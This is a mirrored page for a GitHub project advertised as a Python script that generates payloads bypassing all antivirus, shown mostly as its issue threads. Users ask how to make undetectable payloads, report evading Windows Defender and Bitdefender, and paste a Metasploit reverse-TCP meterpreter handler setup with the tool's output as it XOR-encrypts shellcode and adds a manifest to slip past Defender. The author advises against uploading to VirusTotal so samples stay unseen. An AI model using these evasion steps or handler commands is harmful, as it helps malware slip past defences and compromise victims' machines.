Giter Site home page Giter Site logo

stormshadow07 / hacktheworld Goto Github PK

View Code? Open in Web Editor NEW
916.0 27.0 174.0 425 KB

An Python Script For Generating Payloads that Bypasses All Antivirus so far .

Shell 19.04% Python 80.96%
bypass antivirus malware metasploit bypass-av bypass-antivirus python bypassantivirus bypassing-avs bypass-uac

hacktheworld's People

Contributors

stormshadow07 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

hacktheworld's Issues

i got big issue in

mt.exe : general error c101008d: Failed to write the updated manifest to the resource of file "./result/final_4444.exe". File not found.
DbgPrint says: mt exited with error: 0x0000001f - General failure.

Im a noob

Hello can please someone tell me how exactly should I use this to create an undetectable payload for me

cant run ./HackTheWorld.py

Can't run the script... I got this:

File "HackTheWorld.py", line 69
print color(("[+] Encrypted Shellcode saved in [{}]".format(Filename)))
^
SyntaxError: invalid syntax
root@kali:~/HackTheWorld# python HackTheWorld.py
Traceback (most recent call last):
File "HackTheWorld.py", line 17, in
from Crypto.Hash import MD5
ImportError: No module named Crypto.Hash

No support for 64bit?

I have Kali Linux 2019.1 64Bit and it says wine32 is not installed yet I have wine64.

Unable to run HackTheWorld.py

Hi!
When trying to run I receive this error:

File "HackTheWorld.py", line 69
print color(("[+] Encrypted Shellcode saved in [{}]".format(Filename)))
^
SyntaxError: invalid syntax

I m using python3; also tryied to start it with python3 HackTheWorld.py but same error;

I modified the file so it can use colorama because maybe it has to do with this python 3 change; but the same
Can you help me?
Thanks!

Another shellcode?

I changed the test.raw shellcode to a different one and I'm getting the same detects as with original. I noticed that, if I comment out the line memcpy(addressPointer ... ) with "unencrypted" bytes there are no detects. Do you have any ideas why it can happen with my shellcode, but not with meterpreter (as in your code)?

the program can't run

if i use the python2 this error is shown:
eee

if i use python this errror is shown:
ee

edit:
i did install pycrypto, pycryptodome and the termcolor

Doubts

Hello, I would like to know what should be typed when the tool shows this message:

Enter the key to encrypt shellcode with

typed anything in that option but would like to know if it has to pass some specific information, I did the test file created in Windows 10 environment with windows defender, the same did not identify as a threat, however after running the file and getting a meterpreter session after a while using commands in the meterpreter, the AV alerted and killed the session, why did that happen?

Congratulations for the tool I'm really enjoying it, do you want to keep it up to date, to make AVs more and more undetectable?

python HackTheWorld.py

root@kali:~/HackTheWorld# python HackTheWorld.py
File "HackTheWorld.py", line 69
print color(("[+] Encrypted Shellcode saved in [{}]".format(Filename)))
^
SyntaxError: invalid syntax

NICE

dude its not an issue juuuuuuuust thanking you for making this script.

Bypasses Bitdefender and more good shit, thanks

Your script got detected by 9/71 whilst veil's got detected by 25/55

TypeError: 'map' object is not subscriptable

Traceback (most recent call last):
  File "HackTheWorld.py", line 151, in <module>
    transformedShellcode = xor(shellcodeBytes, masterKey)
  File "HackTheWorld.py", line 43, in xor
    (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
  File "HackTheWorld.py", line 43, in <genexpr>
    (data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
TypeError: 'map' object is not subscriptable

It shows me this error after I enter encryption key. Can you help me, please?

windows blocks the payload

Windows automatically blocks the file. One has to manually unblock th application. Is this to be expected?

Error

Hi, when I run HackTheWorkd.py I get the error message:

Traceback (most recent call last):
File "./HackTheWorld.py", line 19, in
from termcolor import colored
ImportError: No module named termcolor

How can I solve this problem?

Thank you.

fatal error: windows.h

./result/final_8080.c:1:10: fatal error: windows.h: No such file or directory
#include <windows.h>
^~~~~~~~~~~
compilation terminated.

wine: Bad EXE format

hi i'm seeing this error, how do i fix this?

[+] Adding Manifest
wine: Bad EXE format for z:\root\ally\HackTheWorld\mt.exe.
[+] Final File with Manifest [./result/final_4444.exe]

thanks..

Program cannot start

On win10 I get error
kali@DESKTOP-F6695VT:~/HackTheWorld$ python HackTheWorld.py

Traceback (most recent call last):
File "HackTheWorld.py", line 17, in
from Crypto.Hash import MD5
ImportError: No module named Crypto.Hash

On Kali VM
root@kali:~/HackTheWorld# sudo python HackTheWorld.py

Traceback (most recent call last):
File "HackTheWorld.py", line 19, in
from termcolor import colored
ImportError: No module named termcolor

Doesn't work

i built it ran it on my pc and it didnt show on my metasploit console why?

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.6:4444

and here is my HackTheWorld terminal

[?] Enter Payload TYPE [tcp,https,tcp_dns]: tcp
[+] Payload TYPE : tcp
[?] Enter LHOST for Payload [LHOST] : 192.168.1.6
[+] LHOST for Payload [LPORT] : 192.168.1.6
[?] Enter LPORT for Payload : 4444
[+] LPORT for Payload : 4444
[โœ”] Checking directories...
[+] Creating [./result] directory for resulting code files
No encoder or badchars specified, outputting raw payload
Payload size: 206403 bytes
Saved as: ./result/test.raw
[] Shellcode file [./result/test.raw] successfully loaded
[
] MD5 hash of the initial shellcode: [5caa4fbcc5607afcc7cc1b8daacca315]
[] Shellcode size: [206403] bytes
[?] Enter the Key to Encrypt Shellcode with : bypassing
[+] XOR Encrypting the shellcode with key [bypassing]
[
] Encrypted shellcode size: [206403] bytes
[] Generating C code file
[+] Encrypted Shellcode saved in [./result/final_4444.c]
[+] Compiling file [./result/final_4444.c] with Mingw Compiler
[+] Compiled Sucessfully
[+] Removing Temp Files
[
]Do you want to add Manifest (Generally Bypasses Windows Defender)[ 1 or 0 ]?1

==================================== RESULT ====================================

[+] Adding Manifest
Microsoft (R) Manifest Tool
Copyright (c) Microsoft Corporation.
All rights reserved.
[+] Final File with Manifest [./result/final_4444.exe]

DO NOT UPLOAD ON VIRUS TOTAL

USE "nodistribute.com "

Happy Hacking

Issue running HackTheWorld.py

I must be very dumb (sorry for which), but can somebody help me solve that problem.

user@***:~/HackTheWorld$ python HackTheWorld.py
Traceback (most recent call last):
File "HackTheWorld.py", line 17, in
from Crypto.Hash import MD5
ImportError: No module named Crypto.Hash

Can't run python3 HackTheWorld.py

I try to run the command "python3 HackTheWorld.py" but it won't work.

File "HackTheWorld.py", line 69
print color(("[+] Encrypted Shellcode saved in [{}]".format(Filename)))
^
SyntaxError: invalid syntax

Please help

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.